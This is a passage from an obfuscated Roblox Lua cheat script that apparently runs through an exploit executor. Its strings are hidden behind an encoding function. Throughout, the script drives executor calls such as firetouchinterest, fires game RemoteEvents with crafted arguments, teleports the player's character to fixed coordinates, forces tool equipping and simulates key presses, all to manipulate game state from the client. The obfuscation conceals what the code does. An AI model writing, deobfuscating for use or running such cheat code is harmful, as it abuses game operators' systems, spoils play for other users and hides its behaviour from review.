);game:GetService(v7("\214\218\15\68\103\134\63\201\221\13\69\102\170\50\238\210\26\85\96","\83\128\179\125\48\18\231")):SendKeyEvent(true,Enum.KeyCode.Backspace,false,game);break;end if (v351==(2 -1)) then local v358=0 -0 ;while true do if (v358==(684 -(232 + 451))) then v351=2 + 0 ;break;end if (v358==(0 + 0)) then v352=game.Players.LocalPlayer;repeat wait(564.2 -(510 + 54) );until v352.Character v358=1 -0 ;end end end if (v351==(36 -(13 + 23))) then v324.Health=0;wait();v351=1 -0 ;end if ((2 -0)==v351) then v353=v352.Backpack:FindFirstChild(v7("\225\177\30\135\206\194\166\91\219","\175\166\195\123\233"));if v353 then local v360=0;local v361;while true do if ((0 -0)==v360) then v361=v352.Character:FindFirstChild(v7("\199\215\80\72\254\224\203\89","\144\143\162\61\41"));if v361 then v361:EquipTool(v353);else warn("Humanoid not found in player's character.");end break;end end else warn("Grenade 2 tool not found in player's backpack.");end v351=1091 -(830 + 258) ;end end end break;end end else warn(v7("\109\187\242\196\66\12\29\184\225\157\111\11\80\182\253\210\78\26\29\185\252\201\7\24\82\162\253\217\9","\126\61\215\147\189\39"));end break;end end end v168=4;end if (v168==(14 -10)) then if v169.Character then v171();else v169.CharacterAdded:Connect(v171);end game:GetService(v7("\74\234\19\118\125\237\11\76\123\250","\37\24\159\125")).Heartbeat:Wait();break;end if (v168==(0 + 0)) then v169=game.Players.LocalPlayer;repeat wait();until v169.Character v168=1 + 0 ;end if (v168==(1442 -(860 + 581))) then v169=game.Players.LocalPlayer;repeat wait(0.6 -0 );until v169.Character v168=2 + 0 ;end if (v168==(243 -(237 + 4))) then v170=v169:FindFirstChild(v7("\246\245\248\79\33\98\225\236\240","\16\166\153\153\54\68"));if v170 then local v283=v170:FindFirstChild(v7("\255\182\206\83\116\18\250\192\182\197\72","\153\178\211\160\38\84\65"));if (v283 and v283:IsA(v7("\177\8\72\46\135\5\125\62\139","\75\226\107\58"))) then local v301=0 -0 ;while true do if (v301==0) then v283.Enabled=false;if v283:FindFirstChild(v7("\106\219\28\117\5\199\232\78\219\31\110","\173\56\190\113\26\113\162")) then v283.RemoteEvent:FireServer(v7("\238\211\40\23\246\199\218\109\34\229\206\223\57\22\224\196\204\41","\151\171\190\77\101"));else warn(v7("\247\42\245\166\236\120\46\211\42\246\189\184\115\4\209\111\254\166\237\115\15\133\38\246\233\213\120\5\208\111\203\170\234\120\14\203\97","\107\165\79\152\201\152\29"));end break;end end else warn(v7("\122\75\230\222\20\76\84\92\237\206\90\63\89\65\252\139\82\112\66\64\236\139\91\109\23\71\251\139\90\112\67\14\233\139\103\124\69\75\237\197\115\106\94\0","\31\55\46\136\171\52"));end else warn(v7("\225\36\221\237\212\58\251\225\216\104\210\251\197\104\218\251\196\38\216\186","\148\177\72\188"));end v168=6 -3 ;end end until stopFlag or  not v20  end end);v17:Button(v7("\249\169\121\78\223\165\97\2\251\170\121\2\253\180\112\76\219\162\112\81\154\238\66\2\252\128\60","\34\186\198\21"),function() local v101=0;local v102;local v103;while true do if (0==v101) then v102=game.Players.LocalPlayer.Character:FindFirstChildWhichIsA(v7("\208\29\200\92\204\247\1\193\111\205\247\28\245\92\208\236","\162\152\104\165\61")) or game.Players.LocalPlayer.Character:FindFirstChildWhichIsA(v7("\239\46\161\120\64\228\223\59","\133\173\79\210\29\16")) ;v103=nil;v101=1 -0 ;end if (v101==1) then function v103(v208) local v209=0 + 0 ;while true do if (v209==0) then v208=v208:FindFirstAncestorWhichIsA(v7("\175\125\254\46\189\125\255\63","\75\237\28\141"));if (v208 and firetouchinterest) then local v294=0 + 0 ;while true do if (v294==(0 -0)) then if (v208.Name==v7("\239\79\197\186\42\31\167\213\206\94\220","\129\188\63\172\209\79\123\135")) then return;end task.spawn(function() local v332=0;local v333;while true do if ((0 + 0)==v332) then v333=0 + 0 ;while true do if (v333==(1427 -(85 + 1341))) then firetouchinterest(v208,v102,0);break;end if (v333==(0 -0)) then firetouchinterest(v208,v102,2 -1 );wait();v333=373 -(45 + 327) ;end end break;end end end);v294=1 -0 ;end if (v294==1) then v208.CFrame=v102.CFrame;break;end end end break;end end end for v210,v211 in ipairs(workspace:GetDescendants()) do if v211:IsA(v7("\116\235\243\206\72\208\244\204\78\247\235\196\84\240\227\223","\173\32\132\134")) then v103(v211);end end break;end end end);v17:Button(v7("\125\11\9\226\238\22\223\75\21\9\235\171\113\159","\173\46\123\104\143\206\81"),function() for v139,v140 in next,plr.Backpack:GetChildren() do if ((v140.Name==v7("\147\15\39\132\68\135\4\244\79","\97\212\125\66\234\37\227")) and v140:FindFirstChild(v7("\184\230\187\58\10\143\198\160\48\16\158","\126\234\131\214\85"))) then local v172=0;while true do if (v172==0) then v140.Parent=plr.Character;v140.RemoteEvent:FireServer(mouse.Hit.LookVector);v172=1;end if (v172==(503 -(444 + 58))) then v140.Parent=plr.Backpack;break;end end end end end);v17:Button(v7("\176\208\69\95\95\139\199\93\26\123\139\149\111\91\93\137\149\115\85\65\129","\47\228\181\41\58"),function() game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(127 + 165),11 + 49 , -(34 + 34));end);v17:Button(v7("\146\249\213\62\19\63\13\178\188\236\43\67\120\58\190\245\205\114","\127\198\156\185\91\99\80"),function() game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -286,280 -183 , -(1734 -(64 + 1668)));end);game.Players.LocalPlayer.AutoJumpEnabled=false;game.StarterGui:SetCore(v7("\198\31\194\244\137\4\45\215\243\19\207\241\179\2\54\208","\190\149\122\172\144\199\107\89"),{[v7("\6\12\229\242\251","\158\82\101\145\158")]=v7("\92\241\3\18\65\116\191","\36\16\158\98\118"),[v7("\244\19\219\239","\133\160\118\163\155\56\136\71")]=v7("\209\151\88\178\154\16\180\242\167\117\178\165\10\182\243\177\98\244\163\19\185\239\238\49\186\155\16\183\255\174\116\178\128\26\167\229\171\126\252\255\94","\213\150\194\17\146\214\127"),[v7("\50\170\171\218","\86\123\201\196\180\38\196\194")]=v7("\255\252\205\191\173\167\150\184\224\255\151\189\248\234\213\160\239\166\218\160\250\167\216\188\228\237\205\224\168\225\221\242\162\189\129\250\167\177\140\250\167\177","\207\151\136\185"),[v7("\140\150\58\131\96\113\126\166","\17\200\227\72\226\20\24")]=1978 -(1227 + 746) ,[v7("\179\64\23\219\203\240\236\244","\159\208\33\123\183\169\145\143")]=bindableFunction});
